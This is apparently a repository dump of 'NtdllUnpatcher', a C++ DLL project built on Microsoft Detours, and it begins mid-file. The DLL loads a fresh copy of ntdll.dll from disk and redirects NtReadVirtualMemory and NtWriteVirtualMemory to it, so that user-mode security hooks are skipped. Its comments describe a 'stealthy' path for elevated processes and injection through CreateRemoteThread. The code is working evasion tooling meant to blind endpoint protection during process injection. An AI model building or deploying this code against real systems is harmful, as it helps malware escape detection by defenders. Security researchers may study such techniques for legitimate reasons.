(!WriteProcessMemory(hProcess, pbModule + idh.e_lfanew, &inh, sizeof(inh), NULL)) { 254 | DETOUR_TRACE(("WriteProcessMemory(inh) failed: %d\n", GetLastError())); 255 | goto finish; 256 | } 257 | DETOUR_TRACE(("WriteProcessMemory(inh:%p..%p)\n", 258 | pbModule + idh.e_lfanew, 259 | pbModule + idh.e_lfanew + sizeof(inh))); 260 | 261 | if (!VirtualProtectEx(hProcess, pbModule, inh.OptionalHeader.SizeOfHeaders, 262 | dwProtect, &dwProtect)) { 263 | DETOUR_TRACE(("VirtualProtectEx(idh) restore failed: %d\n", GetLastError())); 264 | goto finish; 265 | } 266 | 267 | fSucceeded = TRUE; 268 | goto finish; 269 | } 270 | -------------------------------------------------------------------------------- /Detours-master/system.mak: -------------------------------------------------------------------------------- 1 | ############################################################################## 2 | ## 3 | ## Establish build target type for Detours. 4 | ## 5 | ## Microsoft Research Detours Package 6 | ## 7 | ## Copyright (c) Microsoft Corporation. All rights reserved. 8 | ## 9 | 10 | ############################################## Determine Processor Build Type. 11 | ## 12 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "" && "$(PROCESSOR_ARCHITEW6432)" != "" 13 | DETOURS_TARGET_PROCESSOR = X86 14 | !ENDIF 15 | 16 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "" 17 | DETOURS_TARGET_PROCESSOR = $(PROCESSOR_ARCHITECTURE) 18 | !ENDIF 19 | 20 | # uppercase DETOURS_TARGET_PROCESSOR 21 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:a=A) 22 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:b=B) 23 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:c=C) 24 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:d=D) 25 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:e=E) 26 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:f=F) 27 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:g=G) 28 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:h=H) 29 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:i=I) 30 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:j=J) 31 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:k=K) 32 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:l=L) 33 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:m=M) 34 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:n=N) 35 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:o=O) 36 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:p=P) 37 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:q=Q) 38 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:r=R) 39 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:s=S) 40 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:t=T) 41 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:u=U) 42 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:v=V) 43 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:w=W) 44 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:x=X) 45 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:y=Y) 46 | DETOURS_TARGET_PROCESSOR=$(DETOURS_TARGET_PROCESSOR:z=Z) 47 | 48 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "AMD64" 49 | DETOURS_TARGET_PROCESSOR = X64 50 | !ENDIF 51 | 52 | 53 | !if "$(DETOURS_TARGET_PROCESSOR:64=)" == "$(DETOURS_TARGET_PROCESSOR)" 54 | DETOURS_32BIT=1 55 | DETOURS_BITS=32 56 | !else 57 | DETOURS_64BIT=1 58 | DETOURS_BITS=64 59 | !endif 60 | 61 | ########################################## Configure build based on Processor. 62 | ## 63 | ## DETOURS_OPTION_PROCESSOR: Set this macro if the processor *will* run code 64 | ## from another ISA (i.e. x86 on x64). 65 | ## 66 | ## DETOURS_OPTION_BITS: Set this macro if the processor *may* have an 67 | ## an alternative word size. 68 | ## 69 | !IF "$(DETOURS_TARGET_PROCESSOR)" == "X64" 70 | #!MESSAGE Building for 64-bit X64. 71 | DETOURS_SOURCE_BROWSING = 0 72 | DETOURS_OPTION_PROCESSOR=X86 73 | DETOURS_OPTION_BITS=32 74 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "IA64" 75 | #!MESSAGE Building for 64-bit IA64. 76 | DETOURS_OPTION_PROCESSOR=X86 77 | DETOURS_OPTION_BITS=32 78 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "X86" 79 | #!MESSAGE Building for 32-bit X86. 80 | DETOURS_OPTION_BITS=64 81 | # Don't set DETOURS_OPTION_PROCESSOR for x64 because we don't *know* that 82 | # we'll run on a 64-bit machine. 83 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "ARM" 84 | #!MESSAGE Building for 32-bit ARM. 85 | !ELSEIF "$(DETOURS_TARGET_PROCESSOR)" == "ARM64" 86 | #!MESSAGE Building for 64-bit ARM. 87 | !ELSE 88 | !MESSAGE Note: To select the target processor architecture set either 89 | !MESSAGE PROCESSOR_ARCHITECTURE or DETOURS_TARGET_PROCESSOR. 90 | !MESSAGE 91 | !ERROR Unknown target processor: $(DETOURS_TARGET_ARCHITECTURE) 92 | !ENDIF 93 | 94 | ############################################################################## 95 | ## 96 | INCD = $(ROOT)\include 97 | LIBD = $(ROOT)\lib.$(DETOURS_TARGET_PROCESSOR)$(DETOURS_CONFIG) 98 | BIND = $(ROOT)\bin.$(DETOURS_TARGET_PROCESSOR)$(DETOURS_CONFIG) 99 | OBJD = obj.$(DETOURS_TARGET_PROCESSOR)$(DETOURS_CONFIG) 100 | !IF "$(DETOURS_OPTION_PROCESSOR)" != "" 101 | OPTD = $(ROOT)\bin.$(DETOURS_OPTION_PROCESSOR)$(DETOURS_CONFIG) 102 | !ENDIF 103 | 104 | INCDS = $(ROOT)\include 105 | 106 | LIBDS = \ 107 | $(ROOT)\lib.x86$(DETOURS_CONFIG) \ 108 | $(ROOT)\lib.x64$(DETOURS_CONFIG) \ 109 | $(ROOT)\lib.ia64$(DETOURS_CONFIG) \ 110 | $(ROOT)\lib.arm$(DETOURS_CONFIG) \ 111 | $(ROOT)\lib.arm64$(DETOURS_CONFIG) \ 112 | 113 | BINDS = \ 114 | $(ROOT)\bin.x86$(DETOURS_CONFIG) \ 115 | $(ROOT)\bin.x64$(DETOURS_CONFIG) \ 116 | $(ROOT)\bin.ia64$(DETOURS_CONFIG) \ 117 | $(ROOT)\bin.arm$(DETOURS_CONFIG) \ 118 | $(ROOT)\bin.arm64$(DETOURS_CONFIG) \ 119 | 120 | OBJDS = \ 121 | obj.x86$(DETOURS_CONFIG) \ 122 | obj.x64$(DETOURS_CONFIG) \ 123 | obj.ia64$(DETOURS_CONFIG) \ 124 | obj.arm$(DETOURS_CONFIG) \ 125 | obj.arm64$(DETOURS_CONFIG) \ 126 | 127 | ############################################################################## 128 | -------------------------------------------------------------------------------- /NtdllUnpatcher.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.421 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtdllUnpatcher", "NtdllUnpatcher\NtdllUnpatcher.vcxproj", "{54EE62C1-6375-4EDF-B79D-3F918919C98C}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtdllUnpatcher_Injector", "NtdllUnpatcher_Injector\NtdllUnpatcher_Injector.vcxproj", "{59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x64.ActiveCfg = Debug|x64 19 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x64.Build.0 = Debug|x64 20 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x86.ActiveCfg = Debug|Win32 21 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x86.Build.0 = Debug|Win32 22 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x64.ActiveCfg = Release|x64 23 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x64.Build.0 = Release|x64 24 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x86.ActiveCfg = Release|Win32 25 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x86.Build.0 = Release|Win32 26 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x64.ActiveCfg = Debug|x64 27 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x64.Build.0 = Debug|x64 28 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x86.ActiveCfg = Debug|Win32 29 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x86.Build.0 = Debug|Win32 30 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x64.ActiveCfg = Release|x64 31 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x64.Build.0 = Release|x64 32 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x86.ActiveCfg = Release|Win32 33 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {CC6E8093-9247-4D66-82AE-9F6633A578D1} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /NtdllUnpatcher/NtdllUnpatcher.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "detours.h" 4 | 5 | using namespace std; 6 | 7 | // Global states in-case we re-enter functions we can skip some setup 8 | HANDLE ntSectionHandle = NULL; 9 | PVOID sectionBaseAddress = NULL; 10 | 11 | // Prototypes for some undocumented APIs we use 12 | NTSTATUS(NTAPI *ZwCreateSection) 13 | (_Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess, 14 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 15 | _In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection, 16 | _In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle); 17 | 18 | 19 | NTSTATUS(NTAPI *NtMapViewOfSection) 20 | (_In_ HANDLE SectionHandle, _In_ HANDLE ProcessHandle, 21 | _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T CommitSize, 22 | _Inout_opt_ PLARGE_INTEGER SectionOffset, _Inout_ PSIZE_T ViewSize, 23 | _In_ DWORD InheritDisposition, _In_ ULONG AllocationType, 24 | _In_ ULONG Win32Protect); 25 | 26 | typedef VOID(__stdcall *_RtlInitUnicodeString)( 27 | PUNICODE_STRING DestinationString, 28 | PCWSTR SourceString 29 | ); 30 | 31 | typedef enum _SECTION_INHERIT { 32 | ViewShare = 1, 33 | ViewUnmap = 2 34 | } SECTION_INHERIT; 35 | bool NtdllFunctionsLoaded = false; 36 | HANDLE ntHandle = NULL; 37 | // Load the basic undocumented APIs we may use 38 | BOOL LoadNtdllFunctions() { 39 | HMODULE hNtdll = GetModuleHandleA("ntdll"); 40 | if (hNtdll == NULL) 41 | { 42 | return FALSE; 43 | } 44 | ZwCreateSection = (NTSTATUS(NTAPI *)( 45 | PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, 46 | HANDLE))GetProcAddress(hNtdll, "ZwCreateSection"); 47 | if (ZwCreateSection == NULL) 48 | { 49 | return FALSE; 50 | } 51 | NtMapViewOfSection = (NTSTATUS(NTAPI *)( 52 | HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, 53 | DWORD, ULONG, ULONG))GetProcAddress(hNtdll, "NtMapViewOfSection"); 54 | if (NtMapViewOfSection == NULL) 55 | { 56 | return FALSE; 57 | } 58 | NtdllFunctionsLoaded = true; 59 | return TRUE; 60 | } 61 | // For PE-parsing the headers differ between versions of windows, we determine which set to use here 62 | #ifdef _WIN64 63 | typedef DWORD64 POINTER; 64 | typedef PIMAGE_DOS_HEADER PDOS_HEADER; 65 | typedef PIMAGE_NT_HEADERS64 PNT_HEADER; 66 | typedef PIMAGE_EXPORT_DIRECTORY PEXPORT_DIR; 67 | #else 68 | typedef DWORD POINTER; 69 | typedef PIMAGE_DOS_HEADER PDOS_HEADER; 70 | typedef PIMAGE_NT_HEADERS PNT_HEADER; 71 | typedef PIMAGE_EXPORT_DIRECTORY PEXPORT_DIR; 72 | #endif 73 | 74 | // As we are dealing with flat-files and not relocating the new ntdll, we need to convert virtual address offsets into file offsets 75 | DWORD RvaToOffset(IMAGE_NT_HEADERS * nth, DWORD RVA) 76 | { 77 | int i; 78 | int sections; 79 | PIMAGE_SECTION_HEADER sectionHeader; 80 | sectionHeader = IMAGE_FIRST_SECTION(nth); 81 | sections = nth->FileHeader.NumberOfSections; 82 | 83 | for (i = 0; i < sections; i++) 84 | { 85 | if (sectionHeader->VirtualAddress <= RVA) 86 | if ((sectionHeader->VirtualAddress + sectionHeader->Misc.VirtualSize) > RVA) 87 | { 88 | RVA -= sectionHeader->VirtualAddress; 89 | RVA += sectionHeader->PointerToRawData; 90 | return RVA; 91 | } 92 | sectionHeader++; 93 | } 94 | return 0; 95 | } 96 | DWORD FindRVA(LPBYTE pFileMap, IMAGE_NT_HEADERS *pNtHdr, DWORD Rva) 97 | { 98 | // Find the file byte offset for the given RVA 99 | int i = 0, 100 | nSections = (int)pNtHdr->FileHeader.NumberOfSections; 101 | IMAGE_SECTION_HEADER *pSectHdr; 102 | 103 | pSectHdr = (IMAGE_SECTION_HEADER *)((LPSTR)pNtHdr + 104 | sizeof(IMAGE_NT_HEADERS)); 105 | while ((i < nSections) && ((pSectHdr[i].VirtualAddress + 106 | pSectHdr[i].Misc.VirtualSize - 1) < Rva)) { 107 | i++; 108 | } 109 | if (((i == nSections) && ((pSectHdr[i].VirtualAddress + 110 | pSectHdr[i].Misc.VirtualSize - 1) < Rva)) || 111 | (pSectHdr[i].VirtualAddress > Rva)) { 112 | return 0; 113 | } 114 | return pSectHdr[i].PointerToRawData + 115 | Rva - pSectHdr[i].VirtualAddress; 116 | } 117 | DWORD GetExportRVA(LPBYTE pExpSect, DWORD SectRva, char *szFunction) 118 | { 119 | // Scan the export section to see if the specified function name 120 | // can be found. If found, we return its RVA. 121 | DWORD i = 0; 122 | IMAGE_EXPORT_DIRECTORY *pDir; 123 | DWORD *pNames, *pAddr; 124 | WORD *pOrd; 125 | 126 | pDir = (IMAGE_EXPORT_DIRECTORY *)pExpSect; 127 | pNames = (DWORD *)(pExpSect + 128 | (DWORD)pDir->AddressOfNames - SectRva); 129 | while ((i < pDir->NumberOfNames) && (strcmp((CHAR*)pExpSect + 130 | (pNames[i] - SectRva), szFunction) != 0)) { 131 | i++; 132 | } 133 | if (i == pDir->NumberOfNames) 134 | return 0; // Function not found 135 | 136 | // Get Function ordinal 137 | pOrd = (WORD *)(pExpSect + 138 | (DWORD)pDir->AddressOfNameOrdinals - SectRva); 139 | 140 | // Get function address table. Function RVA is at ordinal index 141 | pAddr = (DWORD *)(pExpSect + 142 | (DWORD)pDir->AddressOfFunctions - SectRva); 143 | return pAddr[pOrd[i]]; 144 | } 145 | 146 | POINTER GetAddress(HMODULE Handle, char* funcName) 147 | { 148 | POINTER dwAckBase = (POINTER)Handle; 149 | PDOS_HEADER pIDH = (PDOS_HEADER)dwAckBase; 150 | PNT_HEADER pINH = (PNT_HEADER)((POINTER)dwAckBase + pIDH->e_lfanew); 151 | PEXPORT_DIR pIED = (PEXPORT_DIR)(dwAckBase + pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 152 | DWORD ExpOff = FindRVA((LPBYTE)dwAckBase, pINH, (DWORD)pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); 153 | DWORD exportRVA = GetExportRVA((LPBYTE)dwAckBase + ExpOff, (DWORD)pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress, (char*)funcName); 154 | POINTER dwFunc = dwAckBase + FindRVA((LPBYTE)dwAckBase, pINH, exportRVA); 155 | return dwFunc; 156 | } 157 | // Check if process is running with admin permissions, determines if we use sections (more stealthy) or virtualallocs (not stealthy) 158 | BOOL IsElevated() { 159 | BOOL fRet = FALSE; 160 | HANDLE hToken = NULL; 161 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { 162 | TOKEN_ELEVATION Elevation; 163 | DWORD cbSize = sizeof(TOKEN_ELEVATION); 164 | if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) { 165 | fRet = Elevation.TokenIsElevated; 166 | } 167 | } 168 | if (hToken) { 169 | CloseHandle(hToken); 170 | } 171 | return fRet; 172 | } 173 | PVOID ntdllBuf = NULL; 174 | VOID CALLBACK FileIOCompletionRoutine( 175 | __in DWORD dwErrorCode, 176 | __in DWORD dwNumberOfBytesTransfered, 177 | __in LPOVERLAPPED lpOverlapped 178 | ); 179 | 180 | VOID CALLBACK FileIOCompletionRoutine( 181 | __in DWORD dwErrorCode, 182 | __in DWORD dwNumberOfBytesTransfered, 183 | __in LPOVERLAPPED lpOverlapped) 184 | { 185 | } 186 | // Returns a non-hooked address of an NTDLL function 187 | __declspec(dllexport) POINTER GetAddressFromName(char* functionName) 188 | { 189 | // Check some global states in-case we run this function multiple times(optional) 190 | BOOL resi; 191 | if (!NtdllFunctionsLoaded) 192 | { 193 | resi = LoadNtdllFunctions(); 194 | } 195 | else { 196 | resi = true; 197 | } 198 | if (!resi) 199 | { 200 | return NULL; 201 | } 202 | if (ntdllBuf != NULL) 203 | { 204 | return GetAddress((HMODULE)ntdllBuf, functionName); 205 | } 206 | if (ntSectionHandle == NULL) 207 | { 208 | if (ntHandle == NULL) 209 | { 210 | ntHandle = CreateFileA(R"(\\?\C:\windows\system32\ntdll.dll)", GENERIC_READ | GENERIC_EXECUTE , FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_READONLY, NULL); 211 | if (GetLastError() != 0) 212 | { 213 | return NULL; 214 | } 215 | } 216 | OBJECT_ATTRIBUTES ntObjAtt; 217 | UNICODE_STRING ntPath; 218 | PCWSTR filePath = L"\\?\c:\windows\system32\ntdll.dll"; 219 | _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString"); 220 | RtlInitUnicodeString(&ntPath, filePath); 221 | InitializeObjectAttributes(&ntObjAtt, &ntPath, OBJ_CASE_INSENSITIVE | OBJ_INHERIT, NULL, NULL); 222 | LARGE_INTEGER ntLargeInt; 223 | ntLargeInt.u.HighPart = 0; 224 | ntLargeInt.u.LowPart = 0; 225 | ntLargeInt.QuadPart = 0; 226 | BOOL res = GetFileSizeEx(ntHandle, &ntLargeInt); 227 | if (!res) 228 | { 229 | CloseHandle(ntHandle); 230 | return NULL; 231 | } 232 | NTSTATUS status; 233 | // If we're elevated we can load an un-hooked ntdll in a more stealthy manner 234 | if (IsElevated()) 235 | { 236 | status = ZwCreateSection(&ntSectionHandle, SECTION_MAP_EXECUTE, &ntObjAtt, &ntLargeInt, PAGE_EXECUTE, SEC_COMMIT, ntHandle); 237 | if (!NT_SUCCESS(status)) 238 | { 239 | CloseHandle(ntHandle); 240 | return NULL; 241 | } 242 | } 243 | else { // If we're non-elevated we do things the n00b way, improvement can be made here to prevent a single buffer being RWX at any single time 244 | ntdllBuf = VirtualAlloc(NULL, ntLargeInt.QuadPart, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 245 | OVERLAPPED ol = { 0 }; 246 | res = ReadFileEx(ntHandle, ntdllBuf, ntLargeInt.QuadPart, &ol, NULL); 247 | if (!res) 248 | { 249 | return NULL; 250 | } 251 | else { // If we're not elevated then this function returns here 252 | return GetAddress((HMODULE)ntdllBuf, functionName); 253 | } 254 | } // If we're elevated we continue with the stealthier approach 255 | LARGE_INTEGER ntSectionOffsetLI; 256 | PLARGE_INTEGER ntSectionOffset = &ntSectionOffsetLI; 257 | ntSectionOffset->u.LowPart = NULL; 258 | ntSectionOffset->u.HighPart = NULL; 259 | ntSectionOffset->QuadPart = NULL; 260 | SIZE_T ntSizeofSectionView = 0; 261 | status = NtMapViewOfSection(ntSectionHandle, GetCurrentProcess(), §ionBaseAddress, NULL, 262 | NULL, NULL, &ntSizeofSectionView, ViewShare, NULL, PAGE_EXECUTE); 263 | if (!NT_SUCCESS(status)) 264 | { 265 | CloseHandle(ntHandle); 266 | CloseHandle(ntSectionHandle); 267 | return NULL; 268 | } 269 | } 270 | if (ntHandle != NULL) 271 | { 272 | CloseHandle(ntHandle); 273 | } 274 | return GetAddress((HMODULE)sectionBaseAddress, functionName); 275 | } 276 | LONG error; 277 | 278 | // Define prototype of functions to hook 279 | NTSTATUS(WINAPI* fNtReadVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded); 280 | NTSTATUS(WINAPI *fNtCreateThreadEx) 281 | ( 282 | OUT PHANDLE hThread, 283 | IN ACCESS_MASK DesiredAccess, 284 | IN LPVOID ObjectAttributes, 285 | IN HANDLE ProcessHandle, 286 | IN LPTHREAD_START_ROUTINE lpStartAddress, 287 | IN LPVOID lpParameter, 288 | IN BOOL CreateSuspended, 289 | IN ULONG StackZeroBits, 290 | IN ULONG SizeOfStackCommit, 291 | IN ULONG SizeOfStackReserve, 292 | OUT LPVOID lpBytesBuffer 293 | ); 294 | NTSTATUS(WINAPI* fNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten); 295 | 296 | // Create "My" versions of hooked functions that redirect execution to non-hooked versions of that function (prototypes must match) 297 | NTSTATUS MyNtReadVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded) 298 | { 299 | fNtReadVirtualMemory = (NTSTATUS(WINAPI *)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded))GetAddressFromName("NtReadVirtualMemory"); 300 | return fNtReadVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded); 301 | } 302 | NTSTATUS MyNtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten) 303 | { 304 | fNtWriteVirtualMemory = (NTSTATUS(WINAPI *)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten))\ 305 | GetAddressFromName("NtWriteVirtualMemory"); 306 | return fNtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten); 307 | } 308 | NTSTATUS MyNtCreateThreadEx(OUT PHANDLE hThread, 309 | IN ACCESS_MASK DesiredAccess, 310 | IN LPVOID ObjectAttributes, 311 | IN HANDLE ProcessHandle, 312 | IN LPTHREAD_START_ROUTINE lpStartAddress, 313 | IN LPVOID lpParameter, 314 | IN BOOL CreateSuspended, 315 | IN ULONG StackZeroBits, 316 | IN ULONG SizeOfStackCommit, 317 | IN ULONG SizeOfStackReserve, 318 | OUT LPVOID lpBytesBuffer) 319 | { 320 | fNtCreateThreadEx = (NTSTATUS(WINAPI *) 321 | ( 322 | OUT PHANDLE hThread, 323 | IN ACCESS_MASK DesiredAccess, 324 | IN LPVOID ObjectAttributes, 325 | IN HANDLE ProcessHandle, 326 | IN LPTHREAD_START_ROUTINE lpStartAddress, 327 | IN LPVOID lpParameter, 328 | IN BOOL CreateSuspended, 329 | IN ULONG StackZeroBits, 330 | IN ULONG SizeOfStackCommit, 331 | IN ULONG SizeOfStackReserve, 332 | OUT LPVOID lpBytesBuffer 333 | ))GetAddressFromName("NtCreateThreadEx"); 334 | return fNtCreateThreadEx(hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer); 335 | } 336 | // Global state to ensure we don't initiate twice 337 | bool init = false; 338 | // Exported initialization so that if we use something like DLL injection we pass this function as a param to e.g. CreateRemoteThread 339 | extern "C" 340 | __declspec(dllexport) BOOL InitializeHooks() 341 | { 342 | if (init) { 343 | return TRUE; 344 | } 345 | // Hook library initialization 346 | DetourRestoreAfterWith(); 347 | DetourTransactionBegin(); 348 | DetourUpdateThread(GetCurrentThread()); 349 | // Load address of functions to hook 350 | fNtReadVirtualMemory = (NTSTATUS(WINAPI *)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded))\ 351 | GetProcAddress(LoadLibraryA("ntdll.dll"), "NtReadVirtualMemory"); 352 | fNtCreateThreadEx = (NTSTATUS(WINAPI *) 353 | ( 354 | OUT PHANDLE hThread, 355 | IN ACCESS_MASK DesiredAccess, 356 | IN LPVOID ObjectAttributes, 357 | IN HANDLE ProcessHandle, 358 | IN LPTHREAD_START_ROUTINE lpStartAddress, 359 | IN LPVOID lpParameter, 360 | IN BOOL CreateSuspended, 361 | IN ULONG StackZeroBits, 362 | IN ULONG SizeOfStackCommit, 363 | IN ULONG SizeOfStackReserve, 364 | OUT LPVOID lpBytesBuffer 365 | ))GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx"); 366 | fNtWriteVirtualMemory = (NTSTATUS(WINAPI* )(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten))\ 367 | GetProcAddress(LoadLibraryA("ntdll.dll"), "NtWriteVirtualMemory"); 368 | // Add hooks 369 | DetourAttach(&(PVOID&)fNtReadVirtualMemory, MyNtReadVirtualMemory); 370 | //DetourAttach(&(PVOID&)fNtCreateThreadEx, MyNtCreateThreadEx); 371 | DetourAttach(&(PVOID&)fNtWriteVirtualMemory, MyNtWriteVirtualMemory); 372 | // Commit all the hooks 373 | error = DetourTransactionCommit(); 374 | if (error != NO_ERROR) 375 | { 376 | return FALSE; 377 | } 378 | init = true; 379 | return TRUE; 380 | } 381 | 382 | extern "C" 383 | __declspec(dllexport) 384 | BOOL APIENTRY DllMain(HMODULE hModule, 385 | DWORD ul_reason_for_call, 386 | LPVOID lpReserved 387 | ) 388 | { 389 | switch (ul_reason_for_call) 390 | { 391 | case DLL_PROCESS_ATTACH: 392 | return InitializeHooks(); 393 | case DLL_THREAD_ATTACH: 394 | case DLL_THREAD_DETACH: 395 | case DLL_PROCESS_DETACH: 396 | break; 397 | } 398 | return TRUE; 399 | } 400 | -------------------------------------------------------------------------------- /NtdllUnpatcher/NtdllUnpatcher.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | extern "C" __declspec(dllexport) BOOL InitializeHooks(); -------------------------------------------------------------------------------- /NtdllUnpatcher/NtdllUnpatcher.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {54EE62C1-6375-4EDF-B79D-3F918919C98C} 24 | Win32Proj 25 | NtdllUnpatcher 26 | 10.0.10240.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | Unicode 47 | Static 48 | 49 | 50 | DynamicLibrary 51 | false 52 | v141 53 | true 54 | Unicode 55 | Static 56 | false 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | true 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | false 87 | 88 | 89 